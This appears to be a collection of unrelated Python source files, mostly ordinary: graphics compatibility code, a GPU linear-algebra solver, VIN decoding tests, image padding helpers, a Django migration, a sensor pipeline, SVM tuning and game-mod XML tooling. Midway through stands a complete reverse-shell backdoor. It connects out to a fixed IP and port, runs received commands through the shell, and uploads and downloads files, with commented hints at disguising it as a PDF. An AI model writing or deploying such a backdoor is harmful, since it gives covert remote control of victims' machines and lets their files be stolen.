if self.transform is None:
self.transform = Transform(self.child)
self.transform.rotate = angle
self.transform.zoom = zoom
rv = renpy.display.render.render(self.transform, width, height, st, at)
if rot_time <= 1.0 or zoom_time <= 1.0:
renpy.display.render.redraw(self.transform, 0)
return rv
# For compatibility with old games.
renpy.display.layout.Transform = Transform
renpy.display.layout.RotoZoom = RotoZoom
renpy.display.layout.SizeZoom = SizeZoom
renpy.display.layout.FactorZoom = FactorZoom
renpy.display.layout.Zoom = Zoom
renpy.display.layout.Revolver = Revolver
renpy.display.layout.Motion = Motion
renpy.display.layout.Interpolate = Interpolate
# Leave these functions around - they might have been pickled somewhere.
renpy.display.layout.Revolve = Revolve # function
renpy.display.layout.Move = Move # function
renpy.display.layout.Pan = Pan # function
|
import numpy
import cupy
from cupy.cuda import cublas
from cupy.cuda import device
from cupy.linalg import util
def solve_triangular(a, b, trans=0, lower=False, unit_diagonal=False,
overwrite_b=False, check_finite=False):
"""Solve the equation a x = b for x, assuming a is a triangular matrix.
Args:
a (cupy.ndarray): The matrix with dimension ``(M, M)``.
b (cupy.ndarray): The matrix with dimension ``(M,)`` or
``(M, N)``.
lower (bool): Use only data contained in the lower triangle of ``a``.
Default is to use upper triangle.
trans (0, 1, 2, 'N', 'T' or 'C'): Type of system to solve:
            - *0* or *'N'* -- :math:`a x = b`
            - *1* or *'T'* -- :math:`a^T x = b`
            - *2* or *'C'* -- :math:`a^H x = b`
unit_diagonal (bool): If ``True``, diagonal elements of ``a`` are
assumed to be 1 and will not be referenced.
overwrite_b (bool): Allow overwriting data in b (may enhance
performance)
check_finite (bool): Whether to check that the input matrices contain
only finite numbers. Disabling may give a performance gain, but may
result in problems (crashes, non-termination) if the inputs do
contain infinities or NaNs.
Returns:
cupy.ndarray:
The matrix with dimension ``(M,)`` or ``(M, N)``.
.. seealso:: :func:`scipy.linalg.solve_triangular`
"""
util._assert_cupy_array(a, b)
if len(a.shape) != 2 or a.shape[0] != a.shape[1]:
raise ValueError('expected square matrix')
if len(a) != len(b):
raise ValueError('incompatible dimensions')
# Cast to float32 or float64
if a.dtype.char in 'fd':
dtype = a.dtype
else:
dtype = numpy.promote_types(a.dtype.char, 'f')
a = cupy.array(a, dtype=dtype, order='F', copy=False)
b = cupy.array(b, dtype=dtype, order='F', copy=(not overwrite_b))
if check_finite:
if a.dtype.kind == 'f' and not cupy.isfinite(a).all():
raise ValueError(
'array must not contain infs or NaNs')
if b.dtype.kind == 'f' and not cupy.isfinite(b).all():
raise ValueError(
'array must not contain infs or NaNs')
m, n = (b.size, 1) if b.ndim == 1 else b.shape
cublas_handle = device.get_cublas_handle()
if dtype == 'f':
trsm = cublas.strsm
else: # dtype == 'd'
trsm = cublas.dtrsm
if lower:
uplo = cublas.CUBLAS_FILL_MODE_LOWER
else:
uplo = cublas.CUBLAS_FILL_MODE_UPPER
if trans == 'N':
trans = cublas.CUBLAS_OP_N
elif trans == 'T':
trans = cublas.CUBLAS_OP_T
elif trans == 'C':
trans = cublas.CUBLAS_OP_C
if unit_diagonal:
diag = cublas.CUBLAS_DIAG_UNIT
else:
diag = cublas.CUBLAS_DIAG_NON_UNIT
trsm(
cublas_handle, cublas.CUBLAS_SIDE_LEFT, uplo,
trans, diag,
m, n, 1, a.data.ptr, m, b.data.ptr, m)
return b
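# Hedged usage sketch (not part of the original module, needs a CUDA device):
# solve a x = b for a lower-triangular a, mirroring scipy.linalg.solve_triangular.
if __name__ == '__main__':
    a = cupy.array([[3., 0., 0.],
                    [2., 1., 0.],
                    [1., 0., 1.]])
    b = cupy.array([6., 4., 2.])
    x = solve_triangular(a, b, lower=True)
    print(x)  # expected: [2. 0. 0.]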
|
from vininfo import Vin
def test_opel():
vin = Vin('W0LPC6DB3CC123456')
assert '%s' % vin
assert vin.wmi == 'W0L'
assert vin.manufacturer == 'Opel/Vauxhall'
assert vin.vds == 'PC6DB3'
assert vin.vis == 'CC123456'
assert vin.years == [2012, 1982]
assert vin.region_code == 'W'
assert vin.region == 'Europe'
assert vin.country_code == 'W0'
assert vin.country == 'Germany/West Germany'
assert '%s' % vin.brand == 'Opel (Opel/Vauxhall)'
details = vin.details
assert details.model.code == 'P'
assert details.model.name == ['Astra J', 'Zafira C']
assert details.body.code == '6'
assert details.body.name == 'Hatchback, 5-Door'
assert details.engine.code == 'B'
assert details.engine.name == 'A14XER100HP'
assert details.plant.code == 'C'
assert details.plant.name == 'Yelabuga'
assert details.serial.code == '123456'
|
import numpy
import cv2
def contour_coordinates(contour):
    '''
    Returns the x coordinate of the centroid of a contour
    (or None for contours whose area is too small)
    '''
    if cv2.contourArea(contour) > 10:
        M = cv2.moments(contour)
        return int(M['m10'] / M['m00'])
def drawSquare(image):
    '''
    Pads the (upscaled) image with black borders so that it becomes square
    '''
    b = [0, 0, 0]
    height, width = image.shape[0], image.shape[1]
    if height == width:  # already square
        square = image
        return square
    else:
        d_size = cv2.resize(image, (2*width, 2*height), interpolation=cv2.INTER_CUBIC)
        height, width = height * 2, width * 2
        if height > width:
            # pad left and right so the width matches the height
            padding = (height - width) // 2
            d_size_square = cv2.copyMakeBorder(d_size, 0, 0, padding, padding, cv2.BORDER_CONSTANT, value=b)
        else:
            # pad top and bottom so the height matches the width
            padding = (width - height) // 2
            d_size_square = cv2.copyMakeBorder(d_size, padding, padding, 0, 0, cv2.BORDER_CONSTANT, value=b)
        return d_size_square
def resize(image, dim):
    '''
    Returns original image resized to shape 'dim'
    '''
    b = [0, 0, 0]
    dim = dim - 4
    squared = image
    r = float(dim) / squared.shape[1]
    d = (dim, int(squared.shape[0] * r))
    resized = cv2.resize(image, d, interpolation=cv2.INTER_AREA)
    height, width = resized.shape[0], resized.shape[1]
    if height > width:
        resized = cv2.copyMakeBorder(resized, 0, 0, 0, 1, cv2.BORDER_CONSTANT, value=b)
    if height < width:
        resized = cv2.copyMakeBorder(resized, 1, 0, 0, 0, cv2.BORDER_CONSTANT, value=b)
    resized = cv2.copyMakeBorder(resized, 2, 2, 2, 2, cv2.BORDER_CONSTANT, value=b)
    height, width = resized.shape[0], resized.shape[1]
    return resized
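# Hedged usage sketch (not part of the original module): pad a small, non-square
# "digit" image to a square and then fit it into a 28x28 cell, printing the
# resulting shapes.  The blank image below stands in for a real cropped digit.
if __name__ == '__main__':
    digit = numpy.zeros((20, 12, 3), dtype=numpy.uint8)
    square = drawSquare(digit)
    cell = resize(square, 28)
    print(square.shape, cell.shape)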
|
# Generated by Django 2.2 on 2020-04-21 14:03
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('coreapp', '0056_auto_20200420_1340'),
]
operations = [
migrations.AddField(
model_name='projectpricing',
name='custom_supprt',
field=models.FloatField(default=0.0),
),
]
|
'''
Created on Jul 30, 2012
@author: Gary
'''
import abc
from pubsub import pub
from housemonitor.lib.base import Base
from datetime import datetime
from housemonitor.lib.common import Common
from housemonitor.lib.getdatetime import GetDateTime
from housemonitor.lib.constants import Constants
import copy
class abcStep( Base ):
'''
    This is an abstract class used by the step routines to convert one type of data to another.
For example: To convert Centigrade to Fahrenheit:
#. Create a class that has a base class of abcStep.
#. Add a function called *step* that does the conversion.
#. Add the other abstract methods and properties that are required:
#. **topic_name** The topic name to which this routine subscribes.
#. **logger_name** Set the logger name.
For an example see the other files in the step directory.
'''
__metaclass__ = abc.ABCMeta
whoami = None
def __init__( self ):
'''
Constructor
'''
super( abcStep, self ).__init__()
pub.subscribe( self.substep, self.topic_name )
pub.subscribe( self.getUseCount, self.statistics_topic_name )
pub.subscribe( self.getErrorCount, self.statistics_topic_name )
self.whoami = self.__class__.__name__
def getUseCount( self, value, data, listeners ):
'''
Report the number of times that step has been called.
:param value: Not used.
:type value: int
:param data: a dictionary containing more information about the value.
:param listeners: a list of the subscribed routines to send the to.
:returns: int, dict, listeners
>>> from steps.zigbee2volts import ZigbeeCountToVolts
>>> zig = ZigbeeCountToVolts()
>>> zig.getUseCount(100, {'device': 'xyz', 'port': 'abc'}, ['a', 'b'])
(0, {'device': 'xyz', 'units': 'V', 'port': 'abc'}, ['a', 'b'])
>>> zig.step(1, {'device': 'xyz', 'port': 'abc'}, ['a', 'b'])
>>> zig.getUseCount(100, {'device': 'xyz', 'port': 'abc'}, ['a', 'b'])
(1, {'device': 'xyz', 'units': 'V', 'port': 'abc'}, ['a', 'b'])
'''
if ( self.counter != 0 ):
self.logger.debug( 'getUseCount = {}'.format( self.counter ) )
data[Constants.DataPacket.device] = 'HouseMonitor.' + self.whoami
data[Constants.DataPacket.port] = data[Constants.DataPacket.name] = 'Count'
data[Constants.DataPacket.arrival_time] = self.last_count_time
try:
Common.send( self.counter, data, copy.copy( listeners ) )
except Exception as ex:
self.logger.exception( 'Common.send error {}'.format( ex ) )
def getErrorCount( self, value, data, listeners ):
        ''' Report the number of errors that have occurred in this step.
:param value: Not used.
:type value: int
:param data: a dictionary containing more information about the
value. Data can be added to this as needed. Here is a list
of values that will be in the data dictionary:
| 1. **date:** time received: time when value was received.
| 2. **units:** units of the number
| 3. **name:** name assigned to the value
:param listeners: a list of the subscribed routines to send the data to
:returns: count, data, listeners
:rtype: float, dict, listeners
:Raises: None
>>> from steps.zigbee2volts import ZigbeeCountToVolts
>>> zig = ZigbeeCountToVolts()
>>> zig.getErrorCount(100, {'device': 'xyz', 'port': 'abc'}, ['a', 'b'])
'''
if ( self.errors != 0 ):
self.logger.debug( 'getErrorCount = {}'.format( self.errors ) )
data[Constants.DataPacket.device] = 'HouseMonitor.' + self.whoami
data[Constants.DataPacket.port] = data[Constants.DataPacket.name] = 'Error Count'
data[Constants.DataPacket.arrival_time] = self.last_error_time
try:
Common.send( self.errors, data, copy.copy( listeners ) )
except Exception as ex:
self.logger.exception( 'Common.send error {}'.format( ex ) )
@abc.abstractproperty
def topic_name( self ): # pragma: no cover
""" The topic name that pubsub uses to send data to this step. """
return 'Should never see this'
counter = 0
''' Contains the number of times that step has been called '''
last_count_time = None
''' Contains time when step was last called. '''
errors = 0
''' Contains the number of errors. '''
last_error_time = None
''' Contains the time of the last error. '''
def logger_name( self ):
""" Set the logger name. This needs to be added to house_monitoring_logging.conf """
return 'steps' # pragma: no cover
@property
def statistics_topic_name( self ):
''' Set the name that pubsub uses to get usage information about the module. '''
return Constants.TopicNames.Statistics
@abc.abstractmethod
def step( self, value, data, listeners ):
'''
Abstract method for the procedure that does all user specific computations.
        :param value: The input value to be processed
:type value: int, float, string, etc
:param data: a dictionary containing more information about the value.
:param listeners: a list of the subscribed routines to send the data to
:returns: new_value, new_data, new_listeners
:rtype: int, dict, listeners
:raises: None
'''
pass # pragma: no cover
def substep( self, value, data, listeners ):
'''
        This function wraps the step function. It counts usage and errors, then sends the data on to the next function.
:param value: The number to convert to volts.
:type value: int, float, string, etc
:param data: a dictionary containing more information about the
value. Data can be added to this as needed. Here is a list
of values that will be in the data dictionary:
| 1 **date:** time received: time when value was received.
| 2. **units:** units of the number
| 3. **name:** name assigned to the value
| 4. **device** name of the device the data is from.
| 5. **port** name of the port the data is from.
:param listeners: a list of the pubsub routines to send the data to
:returns: value, data, listeners
:rtype: value, dict, listeners
:Raises: None
'''
# Trap any exceptions from getting to pubsub
try:
value, data, listeners = self.step( value, data, listeners )
self.counter += 1
self.last_count_time = datetime.utcnow()
self.logger.debug( 'value {} listeners {}'.format( value, listeners ) )
Common.send( value, data, listeners )
except Exception as ex:
self.logger.exception( "{}: {}".format( __name__, ex ) )
self.errors += 1
self.last_error_time = datetime.utcnow()
def instantuate_me( data ): # pragma: no cover
return None
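# Hedged sketch (not part of the original module): the subclassing pattern the
# abcStep docstring describes, converting Centigrade to Fahrenheit.  The topic
# name below is illustrative only, not a real HouseMonitor topic.
class CentigradeToFahrenheit( abcStep ):
    @property
    def topic_name( self ):
        return 'step.centigrade_to_fahrenheit'  # hypothetical pubsub topic
    def logger_name( self ):
        return 'steps'
    def step( self, value, data, listeners ):
        # value in; converted value plus unchanged data and listeners out.
        return value * 9.0 / 5.0 + 32.0, data, listeners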
|
# Copyright (c) 2019 Princeton University
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import markdown
import base64
def main(params):
try:
text = params["markdown"]
except:
return {'Error' : 'Possibly lacking markdown parameter in request.'}
decoded_text = base64.b64decode(text.encode()).decode()
html = markdown.markdown(decoded_text)
return {"html_response": html}
|
import json
import pickle
import matplotlib.pyplot as plt
from sklearn.metrics import plot_confusion_matrix, classification_report
from sklearn.svm import SVC
from sklearn.model_selection import RandomizedSearchCV, RepeatedStratifiedKFold
# Funtion to fine-tune hyperparameters to find the optimal ones
def find_best_params_svc(X_train_transformed, y_train_lables_trf):
params = {
'C': [0.001, 0.01, 0.1, 1, 10, 100, 1000, 10000],
'gamma': [0.0001, 0.001, 0.01, 0.1, 1, 'scale'],
'degree': [0, 1, 2, 3, 4, 5, 6],
'kernel': ['linear', 'poly', 'rbf', 'sigmoid'],
'class_weight': ['balanced', None],
'decision_function_shape': ['ovo', 'ovr']
}
# define evaluation
cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=10, random_state=42)
# define the search
search = RandomizedSearchCV(estimator=SVC(), param_distributions=params, n_jobs=-1, cv=cv, scoring='accuracy', verbose=3, refit=True)
# fitting the model for search
search.fit(X_train_transformed, y_train_lables_trf)
# print results
print(search.best_score_)
print(search.best_estimator_)
return search.best_estimator_
# Load trained model saved
def load_model():
# load configuration file
js = open('config.json').read()
config = json.loads(js)
# load the model saved
path = config['pre-trained-model']
loaded_model = pickle.load(open(path, 'rb'))
return loaded_model
# Evaluate the performance of the model
# (performance metrics and confusion matrix)
def evaluate_model(model, X_test, y_test, label_dict):
# get predicitions
y_pred = model.predict(X_test)
print(label_dict)
# plot confusion matrix
plot_confusion_matrix( model,
X_test,
y_test,
labels = list(label_dict.values()),
display_labels = list(label_dict.keys()),
normalize = 'true')
plt.show()
cr = classification_report(y_test, y_pred, digits=5, target_names=label_dict.keys())
print(cr)
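# Illustrative driver (an assumption, not part of the original pipeline): run the
# randomized search and the evaluation on a small synthetic dataset just to show the
# call pattern. Note that plot_confusion_matrix requires scikit-learn < 1.2, and the
# repeated 10x10 cross-validation makes the search slow even on toy data.
if __name__ == '__main__':
    from sklearn.datasets import make_classification
    from sklearn.model_selection import train_test_split
    X, y = make_classification(n_samples=200, n_features=10, random_state=42)
    X_train, X_test, y_train, y_test = train_test_split(X, y, stratify=y, random_state=42)
    best_svc = find_best_params_svc(X_train, y_train)
    evaluate_model(best_svc, X_test, y_test, label_dict={'negative': 0, 'positive': 1})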
|
"""
View
Abstract class responsible for drawing the state of the lights
either for the simulator or for the hardware.
Calls the update method before each call.
Maintains a delta time, which is how long it took in between each update.
"""
from abc import ABC, abstractmethod
class View(ABC):
def __init__(self, colors: list, dimensions: tuple, update):
self.colors = colors
self.dimensions = dimensions
self.update = update
@abstractmethod
def draw(self):
"""
Draws the state of the lights
on the GUI or actual hardware.
"""
pass
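# Minimal illustrative subclass (an assumption, not part of the original module):
# a console "display" that refreshes state via the injected update callable and
# then just prints the colors it would render.
class ConsoleView(View):
    def draw(self):
        self.update()
        print(self.dimensions, self.colors)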
|
import os
from updateSteamInfo import create_info_file
def destination_list():
return [
"Artifacts.xml",
"Battles.xml",
"Enemies.xml",
"Heroes.xml",
"HeroesExtra.xml",
"Pacts.xml",
"Spells.xml",
"Structures.xml",
"Tilefields.xml",
"Zones.xml",
"ZonesStorage.xml",
"Spells.xml",
"XXXAnimInfo.xml",
"WorkshopItemInfo.xml"
]
def folder_list():
return [
"artifacts",
"battles",
"enemies",
"heroes",
"heroesXtra",
"pacts",
"spells",
"structures",
"tilefields",
"zones",
"zonesStorage",
"weapons",
"animations",
"workshopInfo"
]
"""Returns a list of tuples with each tuple containing the folder name and
the .xml file the folder contents should be added to"""
def destination_tuples():
return zip(folder_list(), destination_list())
def get_destination_file_name():
return "Destination.txt"
def get_properties_file_name():
return "SteamInfos.txt"
def get_properties():
return [
"steam_folder",
"mod_folder_name"
]
def props_missing():
return not os.path.exists(property_path())
def prompt_props():
if props_missing():
create_info_file(get_properties(), get_properties_file_name())
if props_missing():
input("{} is still not found. Cant update your mod without that file.\n"
"Press enter to exit".format(get_properties_file_name()))
exit()
def get_local_mod_folder_path():
return os.path.join("steamapps", "common", "One Step From Eden", "OSFE_Data", "StreamingAssets", "Mods")
def get_workshop_mod_folder_path():
return os.path.join("steamapps", "workshop", "content", "960690")
def get_backup_folder_name():
return "backup"
def property_path():
return os.path.join(os.getcwd(), get_properties_file_name())
def get_local_mod_path():
lines = []
with open(property_path(), "r") as f:
lines = [l.replace("\n", "") for l in f.readlines()]
path_to_steam = get_property(lines[0])
mod_name = get_property(lines[1])
if mod_name == "":
mod_name = os.path.basename(os.getcwd())
return os.path.join(path_to_steam, get_local_mod_folder_path(), mod_name)
def get_workshop_mod_path():
lines = []
with open(property_path(), "r") as f:
lines = [l.replace("\n", "") for l in f.readlines()]
path_to_steam = get_property(lines[0])
return os.path.join(path_to_steam, get_workshop_mod_folder_path())
def get_property(line):
return line.split(prop_split())[1]
def get_top_tag(destination):
top_tags = {
"Artifacts.xml": "Artifacts",
"Battles.xml": "document",
"Enemies.xml": "Beings",
"Heroes.xml": "Beings",
"HeroesExtra.xml": "Beings",
"Pacts.xml": "Pacts",
"Spells.xml": "Spells",
"Structures.xml": "Beings",
"Tilefields.xml": "document",
"Zones.xml": "document",
"ZonesStorage.xml": "",
"AnimInfo": "Animations",
"WorkshopItemInfo.xml": "WorkshopItemInfo"
}
tag_info = {
"WorkshopItemInfo.xml": r'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"'
}
xml_info = r'<?xml version="1.0" encoding="UTF-8" ?>'
if destination == "ZonesStorage.xml":
return (xml_info, "")
if "AnimInfo" in destination:
destination = "AnimInfo"
if destination in tag_info.keys():
open_tag = xml_info + "\n" + "<" + top_tags[destination] + " " + tag_info[destination] + ">\n"
else:
open_tag = xml_info + "\n" + "<" + top_tags[destination] + ">\n"
close_tag = "\n</" + top_tags[destination] + ">"
return (open_tag, close_tag)
def prop_split():
return "|"
|
"""Generate metric in CSV & XML"""
import csv
import xml.etree.ElementTree as xml
from sys import stdout
from xml.dom import minidom # Used for pretty printing
from metric import metric
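# For reference (an assumption, not shown in this file): the imported `metric` is
# expected to be a dict shaped roughly like
#   {'time': datetime.datetime(...), 'name': 'cpu_usage', 'value': 0.97,
#    'labels': {'host': 'web-1', 'region': 'eu'}}
# i.e. 'time' must support isoformat() and 'labels' must be a str -> str mapping.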
print('CSV')
headers = ['time', 'name', 'value']
writer = csv.DictWriter(stdout, fieldnames=headers)
writer.writeheader()
row = {k: v for k, v in metric.items() if k in headers}
writer.writerow(row)
def element(tag, text):
elem = xml.Element(tag)
elem.text = text
return elem
def pretty_print(elem):
dom = minidom.parseString(xml.tostring(elem))
print(dom.toprettyxml(indent=' '))
print('XML')
root = xml.Element('metric')
root.append(element('time', metric['time'].isoformat()))
root.append(element('name', metric['name']))
root.append(element('value', str(metric['value'])))
labels = xml.Element('labels')
for key, value in metric['labels'].items():
labels.append(xml.Element('label', key=key, value=value))
root.append(labels)
pretty_print(root)
|
#!/usr/bin/env python
import socket
import subprocess
import json
import base64
import sys
import os
import shutil
class Backdoor:
def __init__(self, ip, port):
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((ip, port))
def run(self):
while True:
received_data = self.reliable_receive()
try:
if received_data[0] == "exit":
self.connection.close()
sys.exit()
elif received_data[0] == "cd":
output_data = self.change_working_directory_to(received_data[1])
elif received_data[0] == "download":
output_data = self.read_file(received_data[1])
elif received_data[0] == "upload":
output_data = self.write_file(received_data[1], received_data[2])
else:
output_data = self.command(received_data)
except Exception:
output_data = "[-] Error during command execution."
self.reliable_send(output_data)
def write_file(self, path ,content):
with open(path, "wb") as file :
file.write(base64.b64decode(content))
#file.write(content)
return "[+] Upload successful."
def reliable_send(self, data):
#print(data)
json_data = json.dumps(str(data))
self.connection.send(bytes(json_data, 'utf-8'))
def reliable_receive(self):
json_data = ""
while True:
try:
temp = self.connection.recv(1024)
json_data = json_data + temp.decode('utf-8')
return json.loads(json_data)
except ValueError :
continue
def command(self, received_data):
try:
#DEVNULL = open(os.devnull, 'wb')
output_data = subprocess.check_output(received_data, shell=True, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL)
output_data = output_data.decode('utf-8')
return output_data
except subprocess.CalledProcessError:
return "Error during command execution."
def change_working_directory_to(self, path):
os.chdir(path)
return "[+] change_working_directory_to " + path
def read_file(self, path):
with open(path, "rb") as file:
return base64.b64encode(file.read())
#file_name = sys._MEIPASS + "\syllabus.pdf"
#subprocess.Popen(file_name,shell=True)
my_backdoor = Backdoor("192.168.0.1", 4444) #change ip
my_backdoor.run()
|
import random
dice6 = random.randint(1,6)
dice20 = random.randint(1,20)
coin = random.randint(1,2)
rps = random.randint(1,3)
def heads_tails() :
if (coin == 1) :
return "You got heads."
else :
return "You got tails."
ht_var = heads_tails()
def rock_paper_scissors() :
if (rps == 1) :
return "You got rock."
elif (rps == 2) :
return "You got paper."
else :
return "You got scissors."
rps_var = rock_paper_scissors()
def choiceFCN(event):
say("You chose " + event.value + ".")
if (event.value == "1") :
say("You rolled a " + str(dice6) + ".")
elif (event.value == "2") :
say("You rolled a " + str(dice20) + ".")
elif (event.value == "3") :
say(ht_var)
else :
say(rps_var)
def badChoiceFCN(event):
say("I'm sorry, I didn't understand that. Please try again.")
def the_ask() :
ask("Welcome to the chance facilitator. Select 1 for six sided dice, 2 for twenty sided dice, 3 for a coin flip, 4 for rock paper scissors.", {
"choices":"1(one, 1), 2(two, 2), 3(three, 3), 4(four, 4)",
"timeout":60.0,
"attempts":3,
"onChoice": choiceFCN,
"onBadChoice": badChoiceFCN
})
if(currentCall.initialText is not None) :
ask("", {"choices":"[ANY]"})
the_ask()
else :
the_ask()
|
class Node:
def __init__(self,val=None,nxt=None,prev=None):
self.val = val
self.nxt = nxt
self.prev = prev
class LL:
def __init__(self):
self.head = Node()
self.tail = Node()
self.head.nxt = self.tail
self.tail.prev = self.head
def find(self,val):
cur = self.head.nxt
while cur != self.tail:
if cur.val == val: return cur
cur = cur.nxt
return None
def append(self,val):
new_node = Node(val,self.tail,self.tail.prev)
self.tail.prev.nxt = new_node
self.tail.prev = new_node
def remove(self,val):
node = self.find(val)
if node is not None:
node.prev.nxt = node.nxt
node.nxt.prev = node.prev
return node
return None
class CustomSet:
def __init__(self):
self.table_size = 1024
self.table = [None]*self.table_size
self.max_load_factor = 0.5
self.items = 0
def get_index(self,val,table_size):
return hash(str(val))%table_size
def grow(self):
new_table_size = self.table_size * 2
new_table = [None]*new_table_size
for i in range(self.table_size):
if not self.table[i]: continue
cur_LL = self.table[i]
cur = cur_LL.head.nxt
while cur != cur_LL.tail:
index = self.get_index(cur.val,new_table_size)
if not new_table[index]: new_table[index] = LL()
new_table[index].append(cur.val)
cur = cur.nxt
self.table = new_table
self.table_size = new_table_size
def add(self, val):
if self.items/self.table_size > self.max_load_factor: self.grow()
index = self.get_index(val,self.table_size)
if not self.table[index]: self.table[index] = LL()
cur_LL = self.table[index]
node = cur_LL.find(val)
if node: node.val = val
else:
cur_LL.append(val)
self.items += 1
def exists(self, val):
index = self.get_index(val,self.table_size)
if not self.table[index]: return False
node = self.table[index].find(val)
return node is not None
def remove(self, val):
index = self.get_index(val,self.table_size)
if not self.table[index]: return
node = self.table[index].remove(val)
if node: self.items -= 1
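# Quick illustrative check of the chained-hash set above (not part of the original):
if __name__ == "__main__":
    s = CustomSet()
    s.add(10)
    s.add("ten")
    print(s.exists(10), s.exists("ten"), s.exists(11))   # True True False
    s.remove(10)
    print(s.exists(10))                                   # False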
|
from decimal import ROUND_HALF_DOWN, ROUND_HALF_EVEN, ROUND_HALF_UP, Decimal
from math import ceil, floor, log2
from typing import Union
import torch
from ppq.core import RoundingPolicy
def ppq_numerical_round(value: float,
policy: RoundingPolicy=RoundingPolicy.ROUND_HALF_EVEN) -> int:
"""
reference: https://en.wikipedia.org/wiki/Rounding
    decimal definitions:
- decimal.ROUND_CEILING (towards Infinity)
- decimal.ROUND_DOWN (towards zero)
- decimal.ROUND_FLOOR (towards -Infinity)
- decimal.ROUND_HALF_DOWN (to nearest with ties going towards zero)
- decimal.ROUND_HALF_EVEN (to nearest with ties going to nearest even integer)
- decimal.ROUND_HALF_UP (to nearest with ties going away from zero)
- decimal.ROUND_UP (away from zero)
- decimal.ROUND_05UP (away from zero if last digit after rounding towards zero would have been 0 or 5; otherwise towards zero)
Args:
value (float): [description]
policy (RoundingPolicy, optional): [description]. Defaults to RoundingPolicy.ROUND_HALF_EVEN.
Raises:
ValueError: [description]
Returns:
int: [description]
"""
assert isinstance(value, float), 'numerical round only takes effect on float number.'
if policy == RoundingPolicy.ROUND_HALF_EVEN:
return int(Decimal(value).quantize(exp=Decimal(1), rounding=ROUND_HALF_EVEN))
elif policy == RoundingPolicy.ROUND_HALF_UP:
if value > 0: return int(Decimal(value).quantize(exp=Decimal(1), rounding=ROUND_HALF_UP))
else: return int(Decimal(value).quantize(exp=Decimal(1), rounding=ROUND_HALF_DOWN))
elif policy == RoundingPolicy.ROUND_HALF_DOWN:
if value > 0: return int(Decimal(value).quantize(exp=Decimal(1), rounding=ROUND_HALF_DOWN))
else: return int(Decimal(value).quantize(exp=Decimal(1), rounding=ROUND_HALF_UP))
elif policy == RoundingPolicy.ROUND_HALF_TOWARDS_ZERO:
return ppq_numerical_round(value, RoundingPolicy.ROUND_HALF_DOWN)
elif policy == RoundingPolicy.ROUND_HALF_FAR_FORM_ZERO:
return ppq_numerical_round(value, RoundingPolicy.ROUND_HALF_UP)
elif policy == RoundingPolicy.ROUND_TO_NEAR_INT:
if value > 0: return floor(value + 0.5)
else: return ceil(value - 0.5)
elif policy == RoundingPolicy.ROUND_UP:
return ceil(value)
else:
raise ValueError('Unexpected rounding policy found.')
def ppq_tensor_round(value: torch.Tensor,
policy:RoundingPolicy=RoundingPolicy.ROUND_HALF_EVEN) -> torch.Tensor:
"""
reference: https://en.wikipedia.org/wiki/Rounding
Args:
value (torch.Tensor): [description]
policy (RoundingPolicy, optional): [description]. Defaults to RoundingPolicy.ROUND_HALF_EVEN.
Raises:
ValueError: [description]
Returns:
torch.Tensor: [description]
"""
assert isinstance(value, torch.Tensor), 'tensor round only takes effect on torch tensor.'
if policy == RoundingPolicy.ROUND_HALF_EVEN:
# default rounding policy of torch is ROUND_TO_NEAR_EVEN
# try this: print(torch.Tensor([1.5, 2.5, 3.5, 4.5]).round())
# However it may generate unexpected results due to version difference.
return value.round()
elif policy == RoundingPolicy.ROUND_UP:
return value.ceil()
elif policy == RoundingPolicy.ROUND_HALF_TOWARDS_ZERO:
return torch.sign(value) * torch.ceil(value.abs() - 0.5)
elif policy == RoundingPolicy.ROUND_HALF_FAR_FORM_ZERO:
return torch.sign(value) * torch.floor(value.abs() + 0.5)
elif policy == RoundingPolicy.ROUND_HALF_DOWN:
return torch.ceil(value - 0.5)
elif policy == RoundingPolicy.ROUND_HALF_UP:
return torch.floor(value + 0.5)
elif policy == RoundingPolicy.ROUND_TO_NEAR_INT:
raise NotImplementedError(f'Torch Tensor can not use this rounding policy({policy}) try ROUND_HALF_EVEN instead.')
else:
raise ValueError('Unexpected rounding policy found.')
def ppq_round_to_power_of_2(value: Union[float, int],
policy: RoundingPolicy=RoundingPolicy.ROUND_UP) -> float:
if value == 0: return 0
sign = 1 if value >= 0 else -1
assert isinstance(value, float) or isinstance(value, int), \
'power-of-2 round only takes effect on float or int.'
return sign * float(pow(2, ppq_numerical_round(log2(sign * value), policy=policy)))
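# Illustrative sanity checks (assume the `ppq` package providing RoundingPolicy is
# installed; expected values follow the policy definitions above).
if __name__ == '__main__':
    print(ppq_numerical_round(2.5))                                  # 2 (ties to even)
    print(ppq_numerical_round(2.5, RoundingPolicy.ROUND_HALF_UP))    # 3 (ties away from zero)
    print(ppq_round_to_power_of_2(6.0, RoundingPolicy.ROUND_UP))     # 8.0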
|
# coding=utf-8
from math import sqrt
def read_file(filename):
    lines = [line for line in open(filename)]
    # The first line holds the column titles
    colnames = lines[0].strip().split('\t')[1:]
    rownames = []
    data = []
    for line in lines[1:]:
        p = line.strip().split('\t')
        # The first column of each row is the row name
        rownames.append(p[0])
        # The remaining columns are the data for that row
        data.append([float(x) for x in p[1:]])
    return rownames, colnames, data
# Pearson correlation distance
def pearson(v1, v2):
    # Simple sums
    sum1 = sum(v1)
    sum2 = sum(v2)
    # Sums of squares
    sum1_sq = sum([pow(v, 2) for v in v1])
    sum2_sq = sum([pow(v, 2) for v in v2])
    # Sum of the products
    p_sum = sum([v1[i] * v2[i] for i in range(len(v1))])
    # Compute r (Pearson score)
    num = p_sum - (sum1 * sum2 / len(v1))
    den = sqrt((sum1_sq - pow(sum1, 2) / len(v1)) * (sum2_sq - pow(sum2, 2) / len(v1)))
    if den == 0:
        return 0
    # Return 1 - r so the result behaves like a distance (smaller = more similar)
    return 1.0 - num / den
class BiCluster:
def __init__(self, vec, left=None, right=None, distance=0.0, id=None):
self.left = left
self.right = right
self.vec = vec
self.id = id
self.distance = distance
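# Small illustrative check (not part of the original module): identical vectors give a
# Pearson distance of ~0.0, perfectly anti-correlated vectors a distance of ~2.0.
if __name__ == '__main__':
    print(pearson([1.0, 2.0, 3.0], [1.0, 2.0, 3.0]))   # ~0.0
    print(pearson([1.0, 2.0, 3.0], [3.0, 2.0, 1.0]))   # ~2.0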
|
import json
from typing import Dict, List, Tuple, Any
import pytest
Request = Tuple[str, List[Dict[str, Any]]]
@pytest.fixture(scope="module")
def inputs() -> List[str]:
# Some random examples where sentence 1-2 and 3-4 are most similar to each other.
return [
